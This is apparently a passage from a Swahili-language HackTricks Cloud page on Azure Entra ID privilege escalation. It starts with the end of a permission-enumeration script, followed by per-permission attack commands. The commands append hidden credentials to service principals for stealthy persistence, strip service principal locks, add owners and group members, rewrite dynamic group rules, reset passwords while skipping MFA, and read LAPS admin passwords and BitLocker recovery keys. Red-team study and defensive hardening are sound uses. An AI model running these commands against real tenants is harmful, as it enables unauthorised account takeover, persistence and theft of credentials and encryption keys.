Known Microsoft first-party owner organization IDs.

MICROSOFT_OWNER_ORG_IDS=( “f8cdef31-a31e-4b4a-93e4-5f571e91255a” “72f988bf-86f1-41af-91ab-2d7cd011db47” )

is_microsoft_owner() { local owner=“$1” local id for id in “${MICROSOFT_OWNER_ORG_IDS[@]}”; do if [ “$owner” = “$id” ]; then return 0 fi done return 1 }

get_permission_value() { local resource_app_id=“$1” local perm_type=“$2” local perm_id=“$3” local key value key=“${resource_app_id}|${perm_type}|${perm_id}”

value=“$(awk -F ‘\t’ -v k=”$key“ ‘$1==k {print $2; exit}’ “$tmp_perm_cache”)“ if [ -n “$value” ]; then printf ‘%s\n’ “$value” return 0 fi

if [ “$perm_type” = “Scope” ]; then value=“$(az ad sp show –id “$resource_app_id” –query “oauth2PermissionScopes[?id==‘$perm_id’].value | [0]” -o tsv 2>/dev/null || true)“ elif [ “$perm_type” = “Role” ]; then value=“$(az ad sp show –id “$resource_app_id” –query “appRoles[?id==‘$perm_id’].value | [0]” -o tsv 2>/dev/null || true)“ else value=“” fi

[ -n “$value” ] || value=“UNKNOWN” printf ‘%s\t%s\n’ “$key” “$value” >> “$tmp_perm_cache” printf ‘%s\n’ “$value” }

command -v az >/dev/null 2>&1 || { echo “az CLI not found” >&2; exit 1; } command -v jq >/dev/null 2>&1 || { echo “jq not found” >&2; exit 1; } az account show >/dev/null

apps_json=“$(az ad app list –all –query ‘[?length(requiredResourceAccess) > 0].[displayName,appId,requiredResourceAccess]’ -o json)”

tmp_map=“$(mktemp)” tmp_ids=“$(mktemp)” tmp_perm_cache=“$(mktemp)” trap ‘rm -f “$tmp_map” “$tmp_ids” “$tmp_perm_cache”’ EXIT

Build unique resourceAppId values used by applications.

jq -r ‘.[][2][]?.resourceAppId’ <<<“$apps_json” | sort -u > “$tmp_ids”

Resolve resourceAppId -> owner organization + API display name.

while IFS= read -r rid; do [ -n “$rid” ] || continue sp_json=“$(az ad sp show –id “$rid” –query ‘{owner:appOwnerOrganizationId,name:displayName}’ -o json 2>/dev/null || true)“ owner=“$(jq -r ‘.owner // “UNKNOWN”’ <<<“$sp_json”)“ name=“$(jq -r ‘.name // “UNKNOWN”’ <<<“$sp_json”)“ printf ‘%s\t%s\t%s\n’ “$rid” “$owner” “$name” >> “$tmp_map” done < “$tmp_ids”

echo -e “appDisplayName\tappId\tresourceApiDisplayName\tresourceAppId\tisMicrosoft\tpermissions”

Print all app API permissions and mark if the target API is Microsoft-owned.

while IFS= read -r row; do app_name=“$(jq -r ‘.[0]’ <<<”$row“)“ app_id=“$(jq -r ‘.[1]’ <<<”$row“)“

while IFS= read -r rra; do resource_app_id=“$(jq -r ‘.resourceAppId’ <<<”$rra“)“ map_line=“$(awk -F ‘\t’ -v id=”$resource_app_id“ ‘$1==id {print; exit}’ “$tmp_map”)“ owner_org=“$(awk -F’\t’ ‘{print $2}’ <<<”$map_line“)“ resource_name=“$(awk -F’\t’ ‘{print $3}’ <<<”$map_line“)“

[ -n “$owner_org” ] || owner_org=“UNKNOWN” [ -n “$resource_name” ] || resource_name=“UNKNOWN”

if is_microsoft_owner “$owner_org”; then is_ms=“true” else is_ms=“false” fi

permissions_csv=“” while IFS= read -r access; do perm_type=“$(jq -r ‘.type’ <<<”$access“)“ perm_id=“$(jq -r ‘.id’ <<<”$access“)“ perm_value=“$(get_permission_value “$resource_app_id” “$perm_type” “$perm_id”)“ perm_label=“${perm_type}:${perm_value}” if [ -z “$permissions_csv” ]; then permissions_csv=“$perm_label” else permissions_csv=“${permissions_csv},${perm_label}” fi done < <(jq -c ‘.resourceAccess[]’ <<<“$rra”)

echo -e “${app_name}\t${app_id}\t${resource_name}\t${resource_app_id}\t${is_ms}\t${permissions_csv}” done < <(jq -c ‘.[2][]’ <<<“$row”) done < <(jq -c ‘.[]’ <<<“$apps_json”)

</details>

## Service Principals

### `microsoft.directory/servicePrincipals/credentials/update`

Hii inamruhusu mshambulizi kuongeza credentials kwenye service principals zilizopo. Ikiwa service principal ina privileges zilizoinuliwa, mshambulizi anaweza kujichukulia privileges hizo.
```bash
az ad sp credential reset --id <sp-id> --append

Caution

Nenosiri jipya lililotolewa halitaonekana kwenye web console, kwa hivyo hii inaweza kuwa njia ya stealth ya kudumisha persistence juu ya service principal.
Kutoka kwenye API zinaweza kupatikana kwa: az ad sp list --query '[?length(keyCredentials) > 0 || length(passwordCredentials) > 0].[displayName, appId, keyCredentials, passwordCredentials]' -o json

Ukipata kosa "code":"CannotUpdateLockedServicePrincipalProperty","message":"Property passwordCredentials is invalid." ni kwa sababu haiwezekani kurekebisha property passwordCredentials ya SP na kwanza unahitaji kuifungua. Kwa hilo unahitaji permission (microsoft.directory/applications/allProperties/update) inayokuruhusu kutekeleza:

az rest --method PATCH --url https://graph.microsoft.com/v1.0/applications/<sp-object-id> --body '{"servicePrincipalLockConfiguration": null}'

microsoft.directory/servicePrincipals/synchronizationCredentials/manage

Hii inamruhusu mshambuliaji kuongeza credentials kwa service principals zilizopo. Ikiwa service principal ina privileges zilizoinuliwa, mshambuliaji anaweza kuchukua hizo privileges.

az ad sp credential reset --id <sp-id> --append

microsoft.directory/servicePrincipals/owners/update

Sawa na applications, ruhusa hii inaruhusu kuongeza owners zaidi kwenye service principal. Kumiliki service principal huruhusu udhibiti juu ya credentials na permissions zake.

# Add new owner
spId="<spId>"
userId="<userId>"
az rest --method POST \
--uri "https://graph.microsoft.com/v1.0/servicePrincipals/$spId/owners/\$ref" \
--headers "Content-Type=application/json" \
--body "{
\"@odata.id\": \"https://graph.microsoft.com/v1.0/directoryObjects/$userId\"
}"

az ad sp credential reset --id <sp-id> --append

# You can check the owners with
az ad sp owner list --id <spId>

Caution

Baada ya kuongeza owner mpya, nilijaribu kuiondoa lakini API ilijibu kwamba njia ya DELETE haikusaidiwa, hata kama hiyo ndiyo njia unayohitaji kutumia kufuta owner. Kwa hiyo huwezi kuondoa owners siku hizi.

microsoft.directory/servicePrincipals/disable and enable

Hizi permissions huruhusu kuzima na kuwasha service principals. Mshambulizi anaweza kutumia permission hii kuwasha service principal ambayo angeweza kupata access kwake kwa njia fulani ili kuongeza privileges.

Kumbuka kwamba kwa technique hii mshambulizi atahitaji permissions zaidi ili aweze kuchukua udhibiti wa service principal iliyowashwa.

# Disable
az ad sp update --id <ServicePrincipalId> --account-enabled false

# Enable
az ad sp update --id <ServicePrincipalId> --account-enabled true

microsoft.directory/servicePrincipals/getPasswordSingleSignOnCredentials & microsoft.directory/servicePrincipals/managePasswordSingleSignOnCredentials

Ruhusa hizi zinaruhusu kuunda na kupata credentials za single sign-on ambazo zinaweza kuruhusu ufikiaji wa third-party applications.

# Generate SSO creds for a user or a group
spID="<spId>"
user_or_group_id="<id>"
username="<username>"
password="<password>"
az rest --method POST \
--uri "https://graph.microsoft.com/beta/servicePrincipals/$spID/createPasswordSingleSignOnCredentials" \
--headers "Content-Type=application/json" \
--body "{\"id\": \"$user_or_group_id\", \"credentials\": [{\"fieldId\": \"param_username\", \"value\": \"$username\", \"type\": \"username\"}, {\"fieldId\": \"param_password\", \"value\": \"$password\", \"type\": \"password\"}]}"


# Get credentials of a specific credID
credID="<credID>"
az rest --method POST \
--uri "https://graph.microsoft.com/v1.0/servicePrincipals/$credID/getPasswordSingleSignOnCredentials" \
--headers "Content-Type=application/json" \
--body "{\"id\": \"$credID\"}"

Vikundi

microsoft.directory/groups/allProperties/update

Ruhusa hii inaruhusu kuongeza watumiaji kwenye vikundi vyenye privilege, hivyo kusababisha privilege escalation.

az ad group member add --group <GroupName> --member-id <UserId>

Dokezo: Ruhusa hii haijumuishi Entra ID role-assignable groups.

microsoft.directory/groups/owners/update

Ruhusa hii inaruhusu kuwa mmiliki wa groups. Mmiliki wa group anaweza kudhibiti uanachama wa group na settings zake, na hivyo huenda akaongeza privileges hadi kwenye group.

az ad group owner add --group <GroupName> --owner-object-id <UserId>
az ad group member add --group <GroupName> --member-id <UserId>

Kumbuka: Ruhusa hii haijumuishi Entra ID role-assignable groups.

microsoft.directory/groups/members/update

Ruhusa hii inaruhusu kuongeza wanachama kwenye group. Mshambulizi anaweza kujiongeza yeye mwenyewe au akaunti hasidi kwenye groups zenye privilege inaweza kutoa elevated access.

az ad group member add --group <GroupName> --member-id <UserId>

microsoft.directory/groups/dynamicMembershipRule/update

Ruhusa hii inaruhusu kusasisha sheria ya uanachama katika dynamic group. Mshambuliaji anaweza kurekebisha dynamic rules ili ajumuishwe mwenyewe kwenye privileged groups bila kuongezwa moja kwa moja.

groupId="<group-id>"
az rest --method PATCH \
--uri "https://graph.microsoft.com/v1.0/groups/$groupId" \
--headers "Content-Type=application/json" \
--body '{
"membershipRule": "(user.otherMails -any (_ -contains \"security\")) -and (user.userType -eq \"guest\")",
"membershipRuleProcessingState": "On"
}'

Dokezo: Ruhusa hii haijumuishi Entra ID role-assignable groups.

Dynamic Groups Privesc

Inaweza kuwa inawezekana kwa watumiaji kuongeza privileges kwa kubadilisha sifa zao wenyewe ili waongezwe kama wanachama wa dynamic groups. Kwa maelezo zaidi angalia:

Az - Dynamic Groups Privesc

Users

microsoft.directory/users/password/update

Ruhusa hii inaruhusu kuweka upya nenosiri la watumiaji wasio-admin, ikimruhusu mshambulizi anayetarajiwa kuongeza privileges kwenda kwa watumiaji wengine. Ruhusa hii haiwezi kupewa custom roles.

# Update user password
userId="<user-id>"
az ad user update --id $userId --password "kweoifuh.234"

# Update user password without needing to change or use MFA on next sign-in
az rest --method PATCH \
--uri "https://graph.microsoft.com/v1.0/users/$userId" \
--headers "Content-Type=application/json" \
--body "{
\"passwordProfile\": {
\"forceChangePasswordNextSignInWithMfa\": false,
\"forceChangePasswordNextSignIn\": false,
\"password\": \"kweoifuh.234\"
}
}"

microsoft.directory/users/basic/update

Haki hii inaruhusu kurekebisha sifa za mtumiaji. Ni jambo la kawaida kupata dynamic groups zinazoongeza watumiaji kulingana na values za sifa, kwa hiyo, permission hii inaweza kumruhusu mtumiaji kuweka value ya sifa inayohitajika ili kuwa mwanachama wa dynamic group maalum na kuongeza privileges.

#e.g. change manager of a user
victimUser="<userID>"
managerUser="<userID>"
az rest --method PUT \
--uri "https://graph.microsoft.com/v1.0/users/$managerUser/manager/\$ref" \
--headers "Content-Type=application/json" \
--body '{"@odata.id": "https://graph.microsoft.com/v1.0/users/$managerUser"}'

#e.g. change department of a user
az rest --method PATCH \
--uri "https://graph.microsoft.com/v1.0/users/$victimUser" \
--headers "Content-Type=application/json" \
--body "{\"department\": \"security\"}"

Sera za Conditional Access & MFA bypass

Sera za conditional access zilizo sanidiwa vibaya zinazohitaji MFA zinaweza kupuuzwa, angalia:

Az - Conditional Access Policies & MFA Bypass

Vifaa

microsoft.directory/devices/registeredOwners/update

Ruhusa hii inaruhusu attackers kujiteua kama wamiliki wa vifaa ili kupata udhibiti au access kwa mipangilio na data mahususi ya kifaa.

deviceId="<deviceId>"
userId="<userId>"
az rest --method POST \
--uri "https://graph.microsoft.com/v1.0/devices/$deviceId/owners/\$ref" \
--headers "Content-Type=application/json" \
--body '{"@odata.id": "https://graph.microsoft.com/v1.0/directoryObjects/$userId"}'

microsoft.directory/devices/registeredUsers/update

Ruhusa hii inaruhusu washambuliaji kuhusisha akaunti yao na devices ili kupata access au kupita security policies.

deviceId="<deviceId>"
userId="<userId>"
az rest --method POST \
--uri "https://graph.microsoft.com/v1.0/devices/$deviceId/registeredUsers/\$ref" \
--headers "Content-Type=application/json" \
--body '{"@odata.id": "https://graph.microsoft.com/v1.0/directoryObjects/$userId"}'

microsoft.directory/deviceLocalCredentials/password/read

Ruhusa hii inawaruhusu washambuliaji kusoma sifa za credentials za akaunti ya local administrator zilizo backup kwa Microsoft Entra joined devices, ikiwa ni pamoja na password

# List deviceLocalCredentials
az rest --method GET \
--uri "https://graph.microsoft.com/v1.0/directory/deviceLocalCredentials"

# Get credentials
deviceLC="<deviceLCID>"
az rest --method GET \
--uri "https://graph.microsoft.com/v1.0/directory/deviceLocalCredentials/$deviceLCID?\$select=credentials" \

BitlockerKeys

microsoft.directory/bitlockerKeys/key/read

Ruhusa hii inaruhusu kufikia BitLocker keys, jambo ambalo linaweza kumruhusu mshambuliaji ku-decrypt drives, na kuhatarisha data confidentiality.

# List recovery keys
az rest --method GET \
--uri "https://graph.microsoft.com/v1.0/informationProtection/bitlocker/recoveryKeys"

# Get key
recoveryKeyId="<recoveryKeyId>"
az rest --method GET \
--uri "https://graph.microsoft.com/v1.0/informationProtection/bitlocker/recoveryKeys/$recoveryKeyId?\$select=key"

Ruhusa Nyingine Zinazovutia (TODO)

• microsoft.directory/applications/permissions/update
• microsoft.directory/servicePrincipals/permissions/update
• microsoft.directory/applications.myOrganization/allProperties/update
• microsoft.directory/applications/allProperties/update
• microsoft.directory/servicePrincipals/appRoleAssignedTo/update
• microsoft.directory/applications/appRoles/update
• microsoft.directory/applications.myOrganization/permissions/update

Tip

Jifunze na ufanye mazoezi ya AWS Hacking:HackTricks Training AWS Red Team Expert (ARTE)
Jifunze na ufanye mazoezi ya GCP Hacking: HackTricks Training GCP Red Team Expert (GRTE)
Jifunze na ufanye mazoezi ya Az Hacking: HackTricks Training Azure Red Team Expert (AzRTE)

Saidia HackTricks

• Angalia the subscription plans!
• Jiunge na 💬 Discord group au the telegram group au utufuate kwenye Twitter 🐦 @hacktricks_live.
• Shiriki hacking tricks kwa kutuma PRs kwa HackTricks and HackTricks Cloud github repos.